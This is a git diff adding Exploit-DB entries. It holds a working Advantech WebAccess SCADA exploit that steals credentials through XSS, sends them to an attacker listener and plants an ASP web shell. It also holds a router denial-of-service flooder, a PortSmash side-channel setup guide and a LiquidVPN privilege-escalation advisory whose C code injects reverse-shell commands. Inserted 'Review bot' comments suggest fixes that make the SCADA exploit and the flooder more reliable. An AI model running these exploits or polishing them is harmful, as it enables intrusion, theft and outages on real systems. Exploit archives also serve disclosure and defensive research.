diff --git a/exploits/asp/webapps/45774.py b/exploits/asp/webapps/45774.py new file mode 100755 index 000000000..103fb28e0 --- /dev/null +++ b/exploits/asp/webapps/45774.py 
@@ -0,0 +1,303 @@ +# Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution +# Date: 2018-11-02 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: http://www.advantech.com +# Device: NRVMini2 +# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-1MDG1BH +# Version: 8.3.2 +# Tested on: Windows Server 2008 R2 +# CVE: CVE-2018-15705, CVE-2018-15707 +# TRA: https://www.tenable.com/security/research/tra-2018-35 +# Description: +# +# This code exploits two vulnerabilities to gain remote code execution +# with Administrator privileges: +# +# 1) CVE-2018-15707 to steal credentials (XSS). User-interaction required. +# 2) CVE-2018-15705 to write an ASP file to the server. + +from http.server import HTTPServer, BaseHTTPRequestHandler +from base64 import decodestring +import re +import requests, urllib, json +import sys +import argparse + +TIMEOUT = 5 # sec + +def err_and_exit(msg): + print '\n\nERROR: ' + msg + '\n\n' + sys.exit(1) + +# WADashboard client +class WsClient: + def __init__(self, ip, port, https=False): + self.ip = ip + self.port = port + self.https = https + + self.endpoint = 'https' if https else 'http' + self.endpoint += '://' + ip + ':' + str(port) + self.endpoint += '/WADashboard' + + # see if service is up + def grab_projects(self): + url = self.endpoint + '/api/dashboard/v6/waConfig/getWebAccessProjectList' + r = requests.get(url, timeout=TIMEOUT) + if "resString" in r.text: + json_decoded = json.loads(r.text) + if json_decoded['resString'] is not None and len(json_decoded['resString']) > 0: + return json_decoded['resString'] + return None + + # success if we get cookies + def login(self, projectName, user, pw): + # issue a login request and set the cookies + # POST /WADashboard/login?cont=dashboardViewer + # projectName1=myproject&username=admin&password=hello&recId= + url = self.endpoint + '/login?cont=dashboardViewer' + data = { + 'projectName1' : projectName, + 'username' : user, + 'password' : pw, 
+ 'recId' : '' + } + r = requests.post(url, data, timeout=TIMEOUT) + if len(r.cookies) > 0: + self.cookies = r.cookies + return True # success + else: + return False # fail + + def write_file(self, filename, contents): + # /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=contents&overwrite=true + + # post the writeFile request + # for some reason, the data is required in the query string instead of POST data + url = self.endpoint + '/api/dashboard/v1/files/writeFile' + data = { + 'projectSpecies' : victim['project'] + '!savedConfiguration', + 'folderpath' : '../../../../' + filename, # uploads to /Broadweb/ folder + 'msg' : contents, + 'overwrite' : 'true' + } + + url += '?' + urllib.urlencode(data) + r = requests.post(url, cookies=self.cookies, timeout=TIMEOUT) + return (r.status_code == 200) + +# This class will serve as an HTTP listener +class MyWebHandler(BaseHTTPRequestHandler): + def do_GET(self): + + data = self.path.replace('/', '') # remove leading slash + decoded = decodestring(data) + + print "\n***LINK CLICKED!***" + + try: + # carve out the piece we want to match + i = decoded.index('logOnWebService') + k = decoded.index('readNodeStatus') + chunk = decoded[i:k] + + # find our match + regex = '^logOnWebService\\("(.+)", "(.*)"\\);.*' + m = re.match(regex, chunk) + + if not m: + err_and_exit("Couldn't extract credentials...") + + print "\nCredentials stolen..." + user = m.group(1) + pw = m.group(2) + print "- User: " + user + print "- Pass: " + pw + + # login to WADashboard + if not client.login(victim['project'], user, pw): + err_and_exit("Credentials didn't work...") + + print '\nLogged into WADashboard with credentials.' 
+ + # write malicious ASP file + asp_payload = '<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Done."%>' + filename = 'exec.asp' + if not client.write_file(filename, asp_payload): + err_and_exit("Write file failed...") + + print "\n'" + filename + "' written to disk." + + # execute OS command + url = broadweb_root + '/' + filename + data = { + 'p' : victim['project'], + 'n' : victim['node'], + 'c' : victim['cmd'] + } + + url += '?' + urllib.urlencode(data) + r = requests.get(url, timeout=TIMEOUT) # no cookie needed + if r.status_code == 200: + print "\nSuccessful request to '" + url + "'\n" + else: + print "\nThere may be something wrong with the ASP payload.\n" + + print "\nDone!" + except Exception as e: + print "Exception encountered: " + str(e) + + msg = 'hello poppet' + + self.send_response(200) + self.end_headers() + self.wfile.write(str.encode(msg)) + +# MAIN + +# deal with command line flags +desc = '''This exploit targets Advantech WebAccess/SCADA 8.3.2. It has been tested against Windows 2008 R2 x64. + +The goal of the script is to execute code remotely. User interaction is required. + +The following operations will be conducted: +1) Ensure WebAccess application is running. (TCP port 80 by default) +2) Ensure WADashboard is running. (TCP port 8081 by default) +3) Ensure user-specified project exists. +4) Ensure user-specified node exists. +5) Generate malicious link to send to victim user. (exploits CVE-2018-15707 to steal credentials via XSS) +6) Start HTTP listener to receive credentials when victim clicks the link. +7) Login to WADashboard. +8) Write a malicious ASP file to the root of the WebAccess application. (exploits CVE-2018-15705) +Note: elevated privileges will be obtained using the Webdraw RemoteWinExec function. +9) Execute user-specified command. 
+ +Example (equivalent) commands: +python script.py -t 192.168.0.2 -p1 80 -p2 8081 -https false -proj myproject -node mynode -ip 192.168.0.3 -port 9999 -cmd calc.exe +python script.py -t 192.168.0.2 -proj myproject -node mynode -ip 192.168.0.3 -cmd calc.exe +''' + +arg_parser = argparse.ArgumentParser(description=desc) +arg_parser.add_argument('-t', required=True, help='Target IP (Required)') +arg_parser.add_argument('-p1', type=int, default=80, help='WebAccess Port (Default: 80)') +arg_parser.add_argument('-p2', type=int, default=8081, help='WADashboard Port (Default: 8081)') +arg_parser.add_argument('-https', type=bool, default=False, help='HTTPS (Default: false)') +arg_parser.add_argument('-proj', required=True, help='Project name') +arg_parser.add_argument('-node', required=True, help='Node name') +arg_parser.add_argument('-ip', required=True, help='HTTP listener IP') +arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)') +arg_parser.add_argument('-cmd', required=True, help='OS command to be executed') + +args = arg_parser.parse_args() + +# victim settings +victim = dict() +victim['ip'] = args.t +victim['web_port'] = args.p1 # Broadweb web app port +victim['ws_port'] = args.p2 # WADashboard Node.js service port +victim['https'] = args.https +victim['project'] = args.proj +victim['node'] = args.node +victim['cmd'] = args.cmd + +# listener settings +listener = dict() +listener['ip'] = args.ip +listener['port'] = args.port + +# validate IP addresses +ip_pattern = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" +for ip in [victim['ip'], listener['ip']]: + match = re.match(ip_pattern, ip) + if match is None: + print "\nError: IP Address is invalid: '" + ip + "'.\n" + arg_parser.print_help() + sys.exit(1) + +# start the real work +# ensure WebAccess ASP application is running +print "\nPerforming some banner checks to ensure services are running...\n" +proto = 'https' if victim['https'] else 'http' +broadweb_root = proto + '://' + 
victim['ip'] +# no need to add port if it's 80 or 443 +https = victim['https'] +if (https and victim['web_port'] != 443) or (victim['web_port'] != 80 and not https): + broadweb_root += ':' + str(victim['web_port']) +broadweb_root += '/broadWeb' +url = broadweb_root + '/bwRoot.asp' + +try: + r = requests.get(url, timeout=TIMEOUT) +except requests.exceptions.ConnectionError as e: + err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['web_port'])) + +if 'Welcome to Advantech WebAccess' not in r.text: + err_and_exit('WebAccess not found.') + +print 'WebAccess is up.' + +# ensure WADashboard Node.js service is running +# and projects are defined +client = WsClient(victim['ip'], victim['ws_port'], https=https) + +try: + projects = client.grab_projects() +except requests.exceptions.ConnectionError as e: + err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['ws_port'])) + +if not projects: + err_and_exit('Dashboard Viewer not found.') + +print "Dashboard Viewer is up." + +if len(projects) == 0: + err_and_exit("No projects found...") + +print "\nFound projects: " +for project in projects: + print " - " + project + +# ensure specified project exists +if victim['project'] not in projects: + err_and_exit("Specified project, " + victim['project'] + " was not found...") + +print "Specified project '" + victim['project'] + "' exists." 
+ +# ensure nodes are defined for project +# we have to specify a node name to run the custom RemoteWinExec() function +url = broadweb_root + '/' + victim['project'] +'.dpj' +r = requests.get(url, timeout=TIMEOUT) +node_list = list() +if "[nodelist]" in r.text: + for line in r.text.split('\n'): + regex = "^node[0-9]=(.*)$" + m = re.match(regex, line, flags=re.MULTILINE) + if m: + node_list.append(m.group(1).strip()) + +if len(node_list) == 0: + err_and_exit("No nodes found...") + +print "\nFound nodes: " +for node in node_list: + print ' - ' + node + +if victim['node'] not in node_list: + err_and_exit("Node, " + victim['node'] + " not in node list...") + +print "Specified node '" + victim['node'] + "' exists." + +# generate link to send to victim +print "\nSend this link to the victim:" +print "Keep in mind, they could be logged in via localhost." +link = broadweb_root + '/bwmainleft.asp?pid=1&pname=");i=document.createElement(\'img\');' +link += 'i.src="http://' + listener['ip'] + ':' + str(listener['port']) + '/' +link += '"%2bbtoa(document.getElementsByTagName(\'script\')[4].text);//' + +print link + +# start listener +print "\nListening on " + listener['ip'] + ":" + str(listener['port']) +print "Waiting for victim to click link..." +httpd = HTTPServer((listener['ip'], listener['port']), MyWebHandler) +httpd.handle_request() \ No newline at end of file diff --git a/exploits/hardware/local/45785.md b/exploits/hardware/local/45785.md new file mode 100644 index 000000000..bb45d5e81 --- /dev/null +++ b/exploits/hardware/local/45785.md 
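Review bot: The `-https` option is declared with `type=bool`, so the documented invocation `-https false` actually enables HTTPS, because `bool('false')` is True and only an empty string would give False. Declare it as `arg_parser.add_argument('-https', action='store_true', help='Use HTTPS (Default: false)')` and drop the `false` literal from the usage text in `desc`. The file also mixes Python 2 `print` statements and `urllib.urlencode` with the Python 3-only `from http.server import ...`, so it cannot run unmodified under either interpreter; the header should at least state the intended one. For defenders, the observable artifacts are already on the page: a POST to `/WADashboard/api/dashboard/v1/files/writeFile` whose `folderpath` contains `../` traversal, followed by a new `exec.asp` appearing under `/broadWeb/`, are the request pattern and file drop worth alerting on.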
@@ -0,0 +1,122 @@ +# Summary + +This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407. + +![Alt text](parse_raw_simple.png?raw=true "Title") + +# Setup + +## Prerequisites + +A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement. + +This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in `spy` is likely needed. + +## OpenSSL + +Download and install OpenSSL 1.1.0h or lower: + + cd /usr/local/src + wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz + tar xzf openssl-1.1.0h.tar.gz + cd openssl-1.1.0h/ + export OPENSSL_ROOT_DIR=/usr/local/ssl + ./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib + make -j8 + make test + sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw + +If you use a different path, you'll need to make changes to `Makefile` and `sync.sh`. + +# Tooling + +## freq.sh + +Turns off frequency scaling and TurboBoost. + +## sync.sh + +Sync trace through pipes. It has two victims, one of which should be active at a time: + +1. The stock `openssl` running `dgst` command to produce a P-384 signature. +2. A harness `ecc` that calls scalar multiplication directly with a known key. (Useful for profiling.) + +The script will generate a P-384 key pair in `secp384r1.pem` if it does not already exist. + +The script outputs `data.bin` which is what `openssl dgst` signed, and you should be able to verify the ECDSA signature `data.sig` afterwards with + + openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin + +In the `ecc` tool case, `data.bin` and `secp384r1.pem` are meaningless and `data.sig` is not created. 
+ +For the `taskset` commands in `sync.sh`, the cores need to be two logical cores of the same physical core; sanity check with + + $ grep '^core id' /proc/cpuinfo + core id : 0 + core id : 1 + core id : 2 + core id : 3 + core id : 0 + core id : 1 + core id : 2 + core id : 3 + +So the script is currently configured for logical cores 3 and 7 that both map to physical core 3 (`core_id`). + +## spy + +Measurement process that outputs measurements in `timings.bin`. To change the `spy` strategy, check the port defines in `spy.h`. Only one strategy should be active at build time. + +Note that `timings.bin` is actually raw clock cycle counter values, not latencies. Look in `parse_raw_simple.py` to understand the data format if necessary. + +## ecc + +Victim harness for running OpenSSL scalar multiplication with known inputs. Example: + + ./ecc M 4 deadbeef0123456789abcdef00000000c0ff33 + +Will execute 4 consecutive calls to `EC_POINT_mul` with the given hex scalar. + +## parse_raw_simple.py + +Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here. + +You might have to adjust the `CEIL` variable if the plots are too aggressively clipped. + +Python packages: + + sudo apt-get install python-numpy python-matplotlib + +# Usage + +Turn off frequency scaling: + + ./freq.sh + +Make sure everything builds: + + make clean + make + +Take a measurement: + + ./sync.sh + +View the trace: + + python parse_raw_simple.py timings.bin + +You can play around with one victim at a time in `sync.sh`. Sample output for the `openssl dgst` victim is in `parse_raw_simple.png`. 
+ +# Credits + +* Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba) +* Billy Bob Brumley (Tampere University of Technology, Tampere, Finland) +* Sohaib ul Hassan (Tampere University of Technology, Tampere, Finland) +* Cesar Pereida García (Tampere University of Technology, Tampere, Finland) +* Nicola Tuveri (Tampere University of Technology, Tampere, Finland) + + + + +EDB Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45785.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/45776.py b/exploits/hardware/webapps/45776.py new file mode 100755 index 000000000..42fb27276 --- /dev/null +++ b/exploits/hardware/webapps/45776.py 
@@ -0,0 +1,101 @@ +# Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC) +# Google Dork: N/A +# Date: 2018-11-03 +# Exploit Author: Ross Inman +# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers +# Software Link: N/A +# Version: Virgin Media Hub 3.0 +# Tested on: Linux +# CVE : N/A + +#!/usr/bin/python2.7 + +import socket, sys, random, os + +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 
Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + +def connection(ip,port): + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.settimeout(1) + test = s.connect_ex((ip,port)) + s.close() + if(test == 0): + return True + else: + return False + +def dos(ip,port): + socks = [] + payload = """ +POST / HTTP/1.1\ +Host: {} +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +User-Agent: {} +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-GB,en-US;q=0.8,en;q=0.6 + """.format(ip,random.choice(user_agents)) + with open("/tmp/payload.txt","w") as f: + f.write(payload) + f.close() + with open("/tmp/payload.txt","r") as f: + lines = f.readlines() + f.close() + os.remove("/tmp/payload.txt") + while(True): + try: + 
sys.stdout.write("\r[Info]Sending packets => {}".format(ip)) + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((ip,port)) + for line in lines: + s.send(line) + socks.append(s) + except KeyboardInterrupt: + print"\n[Info]Closing connections..." + for sock in socks: + sock.close() + socks.remove(sock) + sys.exit(0) + +def main(): + if(len(sys.argv) != 3): + sys.exit("Usage: ./dos.py {target ip} {port}") + else: + target = sys.argv[1] + port = int(sys.argv[2]) + print"[Info]Checking connection to target..." + check = connection(target,port) + if(not check): + sys.exit("[Failure]Connection to target failed.") + print"[Info]Starting attack on: {}".format(target) + dos(target,port) + +if(__name__ == "__main__"): + main() \ No newline at end of file diff --git a/exploits/json/webapps/45783.html b/exploits/json/webapps/45783.html new file mode 100644 index 000000000..d47455794 --- /dev/null +++ b/exploits/json/webapps/45783.html @@ -0,0 +1,126 @@ + + + + + RoyalTS/X Exploit + + +
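Review bot: In `dos()` the request template is written to the fixed, predictable path `/tmp/payload.txt` and read straight back only to be split into lines, which is unnecessary and a symlink/TOCTOU hazard on a shared host; `lines = payload.splitlines(True)` yields the same list without touching the filesystem, and the explicit `f.close()` calls inside the `with` blocks are redundant. The KeyboardInterrupt cleanup calls `socks.remove(sock)` while iterating over `socks`, so every other socket is skipped and left open; use `for sock in socks: sock.close()` followed by `del socks[:]`. The `user_agents` list is also missing a comma after the `Edge/14.14393` entry, so two user-agent strings are silently concatenated into one, and the `#!/usr/bin/python2.7` shebang sits on line 11 after the header comments, where it has no effect.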

RoyalTS/X Exploit

+ +
+ + \ No newline at end of file diff --git a/exploits/macos/local/45782.c b/exploits/macos/local/45782.c new file mode 100644 index 000000000..350083ade --- /dev/null +++ b/exploits/macos/local/45782.c 
@@ -0,0 +1,312 @@ +/* +======================================================================= +Title: Multiple Privilege Escalation Vulnerabilities +Product: LiquidVPN for MacOS +Vulnerable versions: 1.37, 1.36 and earlier +CVE ID(s): CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859 +Impact: Critical +Homepage: https://www.liquidvpn.com +Identified: 2018-09-29 +By: Bernd Leitner (bernd.leitner [at] gmail dot com) +======================================================================= + +Vendor description: +------------------- +"LiquidVPN creates a secure encrypted link between your device and the +Internet. +When you connect to the Internet from your home, mobile device, office or a +WiFi +hotspot with encryption your traffic can’t be monitored by 3rd parties like +your +ISP. Without encryption, your ISP can store information about the websites +you +use and sell that data to anyone willing to pay for it. Some ISPs even +inject +advertisements into web pages to further profit off of the Internet service +you +pay for." + +Source: https://www.liquidvpn.com + + +Business recommendation: +------------------------ +By exploiting the vulnerabilities documented in this advisory, an attacker +can fully compromise a MacOS system with an installation of the LiquidVPN +client. + +Users are urged to uninstall the application until the vendor ships a new +version +of the LiquidVPN client. + + +Vulnerability overview/description: +----------------------------------- +LiquidVPN installs the helper tool "com.smr.liquidvpn.OVPNHelper" for +performing +privileged (root) actions. In order to allow other LiquidVPN components to +send +messages to the helper tool, it implements an XPC service. Static code +analysis +showed, that the XPC service does not filter incoming messages. This means, +regular users (local attackers) can craft arbitrary XPC messages and send +them +to the service. 
This leads to the following issues: + + +1) "anycmd" Privilege Escalation (reserved CVE-2018-18857) + +After receiving a message, the service checks for the existence of the +"anycmd" parameter: + +============================================================================================ +... +__text:00000001000012E8 lea rsi, aAnycmd ; "anycmd" +__text:00000001000012EF mov rdi, r14 ; char * +__text:00000001000012F2 call _strcmp +__text:00000001000012F7 test eax, eax +__text:00000001000012F9 jnz loc_1000016C2 +__text:00000001000012FF mov [rbp+var_10A38], r15 +__text:0000000100001306 lea rsi, aCommandLine ; +"command_line" +__text:000000010000130D mov rdi, rbx +... +__text:0000000100001336 lea rsi, aR ; "r" +__text:000000010000133D mov rdi, r14 ; char * +__text:0000000100001340 call _popen +... +============================================================================================ + +If "anycmd" is found, the "command_line" parameter is extracted from the +message +and directly passed on to a call to popen() as an argument. + + +2) "openvpncmd" Privilege Escalation (reserved CVE-2018-18856) + +Similar to the previous vulnerability, the service checks if the "openvpn" +parameter exists. If it does, the "openvpncmd" parameter is extracted and +passed +on to a system() call as an argument: + +============================================================================================ +... +__text:00000001000013F1 lea rsi, aOpenvpncmd ; +"openvpncmd" +__text:00000001000013F8 mov rdi, rbx +__text:00000001000013FB call _xpc_dictionary_get_string +... +__text:000000010000166A mov rdi, r15 ; char * +__text:000000010000166D call _system +__text:0000000100001672 lea rsi, aReply ; "reply" +__text:0000000100001679 lea rdx, aOpenvpnCommand ; +"openvpn command executed (ver 3)" +__text:0000000100001680 mov rdi, r12 +__text:0000000100001683 call _xpc_dictionary_set_string +... 
+============================================================================================ + +3) OS Command Injection (reserved CVE-2018-18858) + +If the service detects the "openvpn" parameter in a message, it also checks +if +the parameters "tun_path" or "tap_path" exist. If one of them (or both) +are found, +the values are used as source paths for a copy process using the system() +function. +However, the paths are not sanitized before being passed to system(): + +============================================================================================ +... +__text:00000001000013CD lea rsi, aPathTun ; "path_tun" +__text:00000001000013D4 mov rdi, rbx +__text:00000001000013D7 call _xpc_dictionary_get_string +__text:00000001000013DC mov r14, rax +__text:00000001000013DF lea rsi, aPathTap ; "path_tap" +__text:00000001000013E6 mov rdi, rbx +__text:00000001000013E9 call _xpc_dictionary_get_string +... +__text:000000010000143F call _strcat +__text:0000000100001444 mov rdi, rbx ; char * +__text:0000000100001447 call _strlen +... +__text:0000000100001497 mov rdi, rbx ; char * +__text:000000010000149A call _system +.. +============================================================================================ + +4) Loading of arbitrary Kernel Extensions (reserved CVE-2018-18859) + +The previous vulnerability can also be used to directly install an arbitrary +kernel extension. When the client is installed, "tun_path" and "tap_path" +are +pointed to the application folder for installing +"/Applications/LiquidVPN.app/Contents/Resources/tun.kext" and +"/Applications/LiquidVPN.app/Contents/Resources/tap.kext". +By crafting an XPC message containing attacker controlled kernel extension +paths, +the helper tool installs the kernel extensions using a call to the system +function +kextload(). Note: Since MacOS 10.13, a Kext needs to be signed. In +adddition to that, +Apple introduced user-approval for installing third party kernel +extensions. 
However, +as an attacker has local access to the system and user-approval does not +require the +user to enter a root or admin password, this is not a problem. + + +Proof of concept: +----------------- +The following proof of concepts can be used to execute arbitrary system +commands: + +1) "anycmd" Privilege Escalation + +============================================================================================ +... +xpc_dictionary_set_string(message, "cmd", "anycmd"); +xpc_dictionary_set_bool(message, "blocking", FALSE); +xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]"); +... +============================================================================================ + +2) "openvpncmd" Privilege Escalation + +============================================================================================ +... +xpc_dictionary_set_string(message, "cmd", "openvpn"); +xpc_dictionary_set_string(message, "openvpncmd", "[ARBITRARY CMD]"); +... +============================================================================================ + +3) OS Command Injection + +============================================================================================ +... +xpc_dictionary_set_string(message, "cmd", "openvpn"); +xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;[ARBITRARY +CMD]"); +... +============================================================================================ + +4) Loading of arbitrary Kernel Extensions + +============================================================================================ +... +xpc_dictionary_set_string(message, "cmd", "openvpn"); +xpc_dictionary_set_string(message, "path_tun", "[PATH TO KEXT]"); +... +============================================================================================ + + +Vulnerable / tested versions: +----------------------------- +The following version has been tested and found to be vulnerable: +1.37 (most recent) and 1.36. 
+ +Earlier versions might be vulnerable as well. + + +Vendor contact timeline: +------------------------ +2018-10-04: Requested security contact via twitter @LiquidVPN +2018-10-11: Contacted vendor through dave@liquidvpn.com +2018-10-11: Sent PGP encrypted advisory ( +https://my.liquidvpn.com/canary/syswan) +2018-10-17: Requested status update from vendor +2018-10-30: Sent new contact details & public PGP key to dave@liquidvpn.com +2018-10-30: Received vendor notification: + No patches will be issued as the LiquidVPN client for MacOS +will be + replaced by new app in the future +2018-10-31: Published to Full Disclosure Mailing List + +Solution: +--------- +None. + + +Workaround: +----------- +None. + + +EOF B. Leitner / @2018 +*/ + +// start netcat listener on port 9999 + +#include +#include +#include +#include + +void what(const char *bin) { + printf("%s <1-4>\n", bin); + printf("[1] Privesc (local reverse shell on port 9999 via \"anycmd\")\n"); + printf("[2] Privesc (local reverse shell on port 9999 via \"openvpncmd\")\n"); + printf("[3] Privesc (local reverse shell on port 9999 via OS command injection)\n"); + printf("[4] KEXT (load arbitrary kernel extension from /tmp/tun.kext (has to be signed for MacOS >= 10.13))\n"); +} + +int main(int argc, const char *argv[]) { + + if (argc == 1 || argc > 2) { + what(argv[0]); + return 0; + } + + int option = atoi(argv[1]); + xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0); + + switch(option) { + case 1: + // "anycmd" + xpc_dictionary_set_string(message, "cmd", "anycmd"); + xpc_dictionary_set_bool(message, "blocking", FALSE); + xpc_dictionary_set_string(message, "command_line", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1"); + break; + case 2: + // "openvpncmd" + xpc_dictionary_set_string(message, "cmd", "openvpn"); + xpc_dictionary_set_string(message, "openvpncmd", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1"); + break; + case 3: + // cmd injection via "path_tun". 
"path_tap" is affected by the same bug + mkdir("/tmp/__dummy00_", 0755); + xpc_dictionary_set_string(message, "cmd", "openvpn"); + xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;bash -i >& /dev/tcp/127.0.0.1/9999 0>&1;cat"); + rmdir("/tmp/__dummy00_"); + break; + case 4: + // load arbitrary kext via "path_tun". "path_tap" is affected by the same bug + xpc_dictionary_set_string(message, "cmd", "openvpn"); + xpc_dictionary_set_string(message, "path_tun", "/tmp/tun.kext"); + break; + default: + what(argv[0]); + return 0; + } + + printf("[+] sending xpc message.\n"); + + xpc_connection_t connection = xpc_connection_create_mach_service("com.smr.liquidvpn.OVPNHelper", NULL, 0); + if (connection == NULL) { + printf("[-] connection to xpc service failed.\n"); + return 1; + } + + xpc_connection_set_event_handler(connection, ^(xpc_object_t e) { + // we don't need that here. + }); + + xpc_connection_resume(connection); + + printf("[+] check your listener.\n"); + xpc_object_t result = xpc_connection_send_message_with_reply_sync(connection, message); + + printf("[+] bye.\n"); + + return 0; +} \ No newline at end of file diff --git a/exploits/php/webapps/45773.txt b/exploits/php/webapps/45773.txt new file mode 100644 index 000000000..739640b16 --- /dev/null +++ b/exploits/php/webapps/45773.txt 
